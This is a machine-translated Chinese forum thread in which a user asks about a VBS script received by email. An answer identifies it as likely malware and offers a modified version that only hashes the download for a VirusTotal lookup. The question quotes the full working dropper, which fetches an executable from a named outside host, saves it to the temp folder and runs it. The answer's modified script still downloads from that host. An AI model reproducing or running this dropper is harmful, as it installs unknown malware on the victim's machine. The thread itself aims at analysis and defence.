可能的數據勒索

Question

有人給我發了一封帶有vbs腳本的電子郵件，但我不知道它是什麼，因爲我不知道vbs。

我猜這是騙取我的一些數據的詐騙，但我無法確切地告訴我有什麼數據。有人可能會討論那個scrtip會做什麼嗎？

Sub HTTPUpload(myURL, myPath) 
Dim objShell 
Set objShell = WScript.CreateObject("WScript.Shell") 
Dim i, objFile, objFSO, objHTTP, strFile, strMsg 
Const ForReading = 1, ForWriting = 2, ForAppending = 8 
Set objFSO = CreateObject("Scripting.FileSystemObject") 
Const TemporaryFolder = 2 
Set tfolder = objFSO.GetSpecialFolder(TemporaryFolder) 
tname = objFSO.GetTempName + ".exe" 
myPath = tfolder + "/" + tname 
Set objFile = tfolder.CreateTextFile(tname) 
Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1") 
objHTTP.Open "GET", myURL, False 
objHTTP.Send 
For i = 1 To LenB(objHTTP.ResponseBody) 
    objFile.Write Chr(AscB(MidB(objHTTP.ResponseBody, i, 1))) 
Next 
objFile.Close() 
objShell.Run(myPath) 
Set objShell = Nothing 
End Sub 
HTTPUpload "http://baikalmix.ru/bitrix/js/seo/.../log.php?f=404", "" 

Answer 1

正如其他人所說，它可能很可能是病毒。它正在下載二進制數據，將它寫爲EXE並自行關閉..您可以使用下面的代碼對其進行修改。 ...你也可以刪除電子郵件，忘記那個傢伙。我不知道，當涉及在野外發現病毒時，「每個人」都與我們中的一些人一樣瘋狂......我們囤積這些東西並研究它們。

我已經修改了一些更改，以便爲您提供可在VirusTotal上搜索的MD5哈希和SHA256哈希，並在之後立即刪除該文件。你只需要爲httpUpload重新添加該行......並且它會下載...但是如果你在下面看到，我刪除了試圖使用.Run方法的行。

HTTPUpload "http://baikalmix.ru/bitrix/js/seo/.../log.php?f=404", "" 

您提供被切斷，但如果你仍然有VBS文件，然後直接刪除子HttpUpload的通完子這是正確的之前認爲整個部分的鏈接...更換的全部內容vbs文件除了上面提到的那一行。

Sub HTTPUpload(myURL, myPath) 
    Dim objShell 
    Set objShell = WScript.CreateObject("WScript.Shell") 
    Dim i, objFile, objFSO, objHTTP, strFile, strMsg 
    Const ForReading = 1, ForWriting = 2, ForAppending = 8 
    Set objFSO = CreateObject("Scripting.FileSystemObject") 
    Const TemporaryFolder = 2 
    Set tfolder = objFSO.GetSpecialFolder(TemporaryFolder) 
    tname = objFSO.GetTempName + ".exe" 
    myPath = tfolder + "/" + tname 
    Set objFile = tfolder.CreateTextFile(tname) 
    Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1") 
    objHTTP.Open "GET", myURL, False 
    objHTTP.Send 
    For i = 1 To LenB(objHTTP.ResponseBody) 
     objFile.Write Chr(AscB(MidB(objHTTP.ResponseBody, i, 1))) 
    Next 
    objFile.Close() 
    wscript.echo " MD5Hash: " & MD5Hash(sPath) & VbCrLf & " SHA256Hash: " & Sha256Hash(sPath) 
    Set objShell = Nothing 
End Sub 

Function MD5Hash(sPath) 
    MD5Hash = bytesToHex(MD5HashBytes(GetBytes(sPath))) 
End Function 
Function Sha256Hash(sPath) 
    Sha256Hash = bytesToHex(Sha256HashBytes(GetBytes(sPath))) 
End Function 

Function MD5HashBytes(aBytes) 
    Set objmd5 = CreateObject("System.Security.Cryptography.MD5CryptoServiceProvider") 
    objmd5.Initialize() 
    MD5HashBytes = objmd5.ComputeHash_2((aBytes)) 
End Function 

Function Sha256HashBytes(aBytes) 
    'Set objsha256 = CreateObject("System.Security.Cryptography.MD5CryptoServiceProvider") 
    Set objsha256 = CreateObject("System.Security.Cryptography.SHA256Managed") 
    objsha256.Initialize() 
    Sha256HashBytes = objsha256.ComputeHash_2((aBytes)) 
End Function 

Function StringtoUTFBytes(aString) 
    Set UTF8 = CreateObject("System.Text.UTF8Encoding") 
    StringtoUTFBytes = UTF8.GetBytes_4(aString) 
End Function 

Function BytesToHex(aBytes) 
    For x = 1 to LenB(aBytes) 
     hexStr=Hex(Ascb(MidB((aBytes), x, 1))) 
     if len(hexStr) = 1 Then hexStr ="0" & hexStr 
     bytesToHex=BytesToHex & hexStr 
    Next 
End Function 

Function BytesToBase64(varBytes) 
    With CreateObject("MSXML2.DomDocument").CreateElement("b64") 
     .dataType = "bin.base64" 
     .nodeTypedValue = varBytes 
     BytesToBase64 = .Text 
    End With 
End Function 

Function GetBytes(sPath) 
    With CreateObject("ADODB.Stream") 
     .Type = 1 
     .open 
     .LoadFromFile sPath 
     .Position = 0 
     GetBytes = .Read 
     .Close 
    End With 
End Function